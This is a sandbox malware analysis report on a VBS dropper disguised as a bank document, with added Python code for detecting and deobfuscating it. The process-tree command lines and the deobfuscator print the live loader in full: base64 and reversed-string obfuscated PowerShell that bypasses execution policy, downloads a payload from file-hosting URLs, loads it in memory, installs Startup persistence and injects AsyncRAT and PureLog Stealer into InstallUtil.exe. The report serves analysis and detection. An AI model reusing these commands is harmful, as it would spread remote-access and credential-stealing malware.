Windows Analysis Report
LETA_pdf.vbs
Overview
General Information
Sample name: LETA_pdf.vbs (renamed because the original name is a hash value)
Original sample name: DOCUMENTO_BANCARIO_APROBACION_MULTA_INMEDIATA_ad18184298489184ff189418941894ca189491841948ff48194919848ca5848919848484911555458_INFORMACION_COMPLETA_pdf.vbs
Analysis ID: 1559694
MD5: 8825e4591cadaec1fb1d0082f84c2398
SHA1: 39fca0a522686f7b9b2b9dc5e5874aebcf231159
SHA256: 61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa
Detection
AsyncRAT, PureLog Stealer
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected VBS Downloader Generic
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
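Many of the Sigma and Joe Sandbox signatures above reduce to command-line and parent-child checks over process-creation telemetry. The following Python is an added example, not a Sigma rule and not Joe Sandbox code: it re-states a handful of those checks as small rules and runs them over constructed process-creation records that mirror the process tree of this report. The records are hand-written from the tree (command lines abbreviated with "...", the base64 blob cut to its first 80 characters, parent PIDs assumed from the order of the tree); the rule names, the 40-character base64 threshold and the record layout are this example's own.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields) that
# mirror the process tree in this report. Command lines are abbreviated ("..."),
# the base64 blob is cut to its first 80 characters and the parent PIDs are an
# assumption read from the order of the tree; ppid 0 marks the root.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
COPY = (r"[System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + "
        r"[Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')")
B64_HEAD = "JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6"
EVENTS = [
    {"pid": 2732, "ppid": 0, "image": r"C:\Windows\System32\WScript.exe",
     "cmd": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LETA_pdf.vbs"'},
    {"pid": 4928, "ppid": 2732, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command ' + COPY},
    {"pid": 1776, "ppid": 4928, "image": r"C:\Windows\System32\PING.EXE", "cmd": "ping 127.0.0.1 -n 10"},
    {"pid": 1136, "ppid": 4928, "image": PS, "cmd": "powershell -command " + COPY},
    {"pid": 5100, "ppid": 2732, "image": PS,
     "cmd": '"' + PS + "\" -command $Codigo = '" + B64_HEAD + "';$OWjuxd = [system.Text.encoding]::UTF8"
            ".GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden "
            "-executionpolicy bypass -NoProfile -command $OWjuxD"},
    {"pid": 3960, "ppid": 5100, "image": PS,
     "cmd": '"' + PS + '" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]'
            "+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get ... "
            "PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })"
            "[-1..-(PhRbase64Command.Length)]; ... @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, "
            "fXYdes'+'ativadofXY, ...));').REplACE('PhR','$') )\""},
    {"pid": 6284, "ppid": 3960, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmd": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"'},
]


def _name(image):
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def ancestors(ev, by_pid):
    """Parent, grandparent, ... of ev, nearest first."""
    chain_ = []
    while ev["ppid"] in by_pid:
        ev = by_pid[ev["ppid"]]
        chain_.append(ev)
    return chain_


# Each rule sees one record plus its ancestor list and returns True on a hit.
RULES = {
    "exec_policy_bypass": lambda ev, anc: bool(re.search(r"-(ex\w*|ep)\s+bypass", ev["cmd"], re.I)),
    "hidden_window": lambda ev, anc: bool(re.search(r"-w(indowstyle)?\s+hidden", ev["cmd"], re.I)),
    # FromBase64String together with a long quoted base64 literal (threshold is low for the demo)
    "b64_decode_of_long_literal": lambda ev, anc: bool(re.search(r"frombase64string", ev["cmd"], re.I))
                                                and bool(re.search(r"'[A-Za-z0-9+/]{40,}={0,2}'", ev["cmd"])),
    # PowerShell array slice that reverses a string, or a reversed "https://"
    "reversed_string_obfuscation": lambda ev, anc: "[-1..-(" in ev["cmd"] or "//:sptth" in ev["cmd"],
    # $PSHOME[n]+$PSHOME[m]+'X' is a classic way to spell "iex" without writing it
    "pshome_indexing_iex": lambda ev, anc: bool(re.search(r"\$pshome\[\d+\]", ev["cmd"], re.I)),
    "startup_folder_copy": lambda ev, anc: bool(re.search(r"::Copy\(.*\\Start Menu\\Programs\\Startup\\",
                                                          ev["cmd"], re.I)),
    # ping to loopback chained with & is a delay, not a connectivity check
    "ping_as_sleep": lambda ev, anc: bool(re.search(r"ping\s+127\.0\.0\.1\s+-n\s+\d+\s*&", ev["cmd"], re.I)),
    "script_host_spawns_powershell": lambda ev, anc: _name(ev["image"]) == "powershell.exe"
                                                   and any(_name(a["image"]) in ("wscript.exe", "cscript.exe")
                                                           for a in anc),
    # InstallUtil.exe launched by PowerShell with no arguments: a typical injection host
    "powershell_spawns_installutil_noargs": lambda ev, anc: _name(ev["image"]) == "installutil.exe"
                                                          and bool(anc) and _name(anc[0]["image"]) == "powershell.exe"
                                                          and ev["cmd"].strip().strip('"').lower().endswith("installutil.exe"),
}


def evaluate(events):
    """Return {pid: [rule names that fired]} for every record with at least one hit."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for ev in events:
        fired = [name for name, rule in RULES.items() if rule(ev, ancestors(ev, by_pid))]
        if fired:
            hits[ev["pid"]] = fired
    return hits


def chain(pid, events):
    """Render the ancestry as 'wscript.exe > cmd.exe > powershell.exe'."""
    by_pid = {e["pid"]: e for e in events}
    names = [_name(a["image"]) for a in reversed(ancestors(by_pid[pid], by_pid))]
    return " > ".join(names + [_name(by_pid[pid]["image"])])


if __name__ == "__main__":
    for pid, fired in evaluate(EVENTS).items():
        print(f"{pid:>5}  {chain(pid, EVENTS):<60} {', '.join(fired)}")
```

Run as a script it prints one line per flagged process with its ancestry and the rules that fired; wscript.exe itself and the bare PING.EXE child produce no hits, which is the point of checking the chain rather than single processes. In production the base64 threshold should be far higher than 40 characters, and the `-ex\w*` shorthand should be tightened to the documented spellings of -ExecutionPolicy.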
Process Tree
- System is w10x64
- wscript.exe (PID: 2732, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LETA_pdf.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - cmd.exe (PID: 4928, cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')'), MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    - conhost.exe (PID: 6228, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - PING.EXE (PID: 1776, cmdline: ping 127.0.0.1 -n 10, MD5: 2F46799D79D22AC72C241EC0322B011D)
    - powershell.exe (PID: 1136, cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')'), MD5: 04029E121A0CFA5991749937DD22A1D9)
  - powershell.exe (PID: 5100, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, MD5: 04029E121A0CFA5991749937DD22A1D9)
    - conhost.exe (PID: 3896, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 3960, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )", MD5: 04029E121A0CFA5991749937DD22A1D9)
      - InstallUtil.exe (PID: 6284, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup

The indentation is reconstructed from the command lines, since the extracted report lists the processes in depth-first order without nesting: the /c string of cmd.exe contains the powershell invocation that becomes PID 1136, and the command line of PID 5100 ends by starting powershell.exe with the decoded $OWjuxD, which is exactly the command line of PID 3960. The two conhost.exe entries are the console hosts attached to cmd.exe and to PID 5100.

Stage 1 (PIDs 2732, 4928, 1776, 1136): the VBS calls cmd.exe, which pings 127.0.0.1 ten times as a delay and then copies a script into the user's Startup folder under the name ' sbv.JJC.vbs' (the leading space is part of the command line). The source path is hard-coded as C:\Windows\system32\LETA_pdf.vbs rather than the Desktop path the sample was launched from, so this persistence step only succeeds where the script already sits at that path.

Stage 2 (PID 5100): $Codigo is base64-decoded with [System.Convert]::FromBase64String and the result is run in a second, hidden powershell.exe with -executionpolicy bypass -NoProfile; that child is PID 3960.

Stage 3 (PID 3960): the decoded script builds the string "ieX" from $PSHOME[4], $PSHOME[30] and 'X' ($PSHOME is C:\Windows\System32\WindowsPowerShell\v1.0 here, so those two characters are 'i' and 'e') and calls it on a script whose single quotes, pipe and dollar signs were masked as fXY, uLT and PhR and are restored by the three .REplACE calls. The restored script downloads a file from 1017.filemail.com, takes the text between <<BASE64_START>> and <<BASE64_END>>, reverses it, base64-decodes it, loads the bytes with [System.Reflection.Assembly]::Load and calls dnlib.IO.Home.VAI with fourteen string arguments: the reversed URL txt.70o1jz/eom.xobtac.selif//:sptth (https://files.catbox.moe/zj1o07.txt read forwards), 'InstallUtil', '1', and 'desativado' (Portuguese for 'disabled') for the remaining eleven. The $PSHOME character-indexing construction is also what fires the Sigma rule 'HackTool - CrackMapExec PowerShell Obfuscation'; that rule matches the obfuscation template rather than the tool, so the hit does not by itself mean CrackMapExec is involved.

Stage 4 (PID 6284): InstallUtil.exe is started with no arguments, which matches the 'InstallUtil' argument passed to VAI and the 'Creates a process in suspended mode', 'Writes to foreign memory regions' and 'Injects a PE file into a foreign processes' signatures; it is the most likely host of the AsyncRAT and PureLog Stealer code the Yara rules detected.
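The stage-3 decoding can be reproduced offline. The following Python is an added analyst helper, not code from the report, from Joe Sandbox or from the sample: it applies the sample's own three .REplACE transforms and the $PSHOME character indexing to the inner string literal of PID 3960 (copied from the command line above) and pulls out the indicators. It assumes the default 64-bit $PSHOME path shown in the process tree; nothing is downloaded and the restored script is never executed.

```python
import re

# $PSHOME for the 64-bit powershell.exe; the process tree shows exactly this path
# (assumption: default Windows 10 install, as in the sandbox run).
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# The inner string literal of the PID 3960 command line, copied from the report.
INNER = (
    "'PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'"
    "Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb"
    "209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;"
    "PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = "
    "[Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = "
    "fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = "
    "PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf("
    "PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'"
    "hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - "
    "PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', "
    "PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT "
    "ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = "
    "[Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = "
    "[System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'"
    ".Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom."
    "xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'"
    "YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,"
    "fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,"
    "fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));'"
)


def resolve_invoker(expr, pshome=PSHOME):
    """Resolve $PSHOME[n] character picks: $pSHOMe[4]+$psHOME[30]+'X' -> 'ieX'."""
    parts = re.findall(r"\$psHOME\[(\d+)\]|'([^']*)'", expr, flags=re.I)
    return "".join(pshome[int(idx)] if idx else lit for idx, lit in parts)


def deobfuscate(inner):
    """Join the '+' concatenation, then apply the sample's three case-sensitive
    String.Replace calls in order: fXY -> ' (chars 102,88,89 -> 39), uLT -> |, PhR -> $."""
    script = inner[1:-1].replace("'+'", "")  # drop the outer quotes, join the pieces
    return script.replace("fXY", "'").replace("uLT", "|").replace("PhR", "$")


def summarize(script):
    """Indicators an analyst wants out of the restored script."""
    invoke = re.search(r"Invoke\(\$null, @\((.*?)\)\);", script).group(1)
    args = re.findall(r"'([^']*)'", invoke)
    entry = re.search(r"\[([\w.]+)\]\.GetMethod\('(\w+)'\)", script)
    return {
        "stage2_url": re.search(r"\$imageUrl = '([^']*)'", script).group(1).strip(),
        "markers": re.findall(r"'(<<[A-Z0-9_]+>>)'", script),
        "payload_reversed_before_decode": "[-1..-(" in script,
        "in_memory_load": "[System.Reflection.Assembly]::Load" in script,
        "entry": entry.group(1) + "." + entry.group(2),
        "invoke_args": args,
        "stage3_url": args[0][::-1],  # the first argument is stored reversed
    }


if __name__ == "__main__":
    print("invoker:", resolve_invoker("$pSHOMe[4]+$psHOME[30]+'X'"))
    restored = deobfuscate(INNER)
    for stmt in restored.split(";"):
        print(stmt.strip())
    for key, value in summarize(restored).items():
        print(f"{key}: {value}")
```

Two details of the restored script are worth noting. The filemail URL literal ends in a space (the sample's own typo, preserved above), and the line `$startIndex -ge 0 -and $endIndex -gt $startIndex;` is a bare comparison whose result is discarded, so a download without the <<BASE64_START>>/<<BASE64_END>> markers is not handled and the script would throw at Substring with a negative length.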
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open-source remote administration tool, but it is also used maliciously because it provides a keylogger, remote desktop control and many other functions that can harm the victim's computer. AsyncRAT can be delivered by spear-phishing, malvertising, exploit kits and other techniques. | No Attribution | |

No configs have been found.
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_VBS_Downloader_Generic | Yara detected VBS Downloader Generic | Joe Security |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
| JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary
Source: | Author: Florian Roth (Nextron Systems): |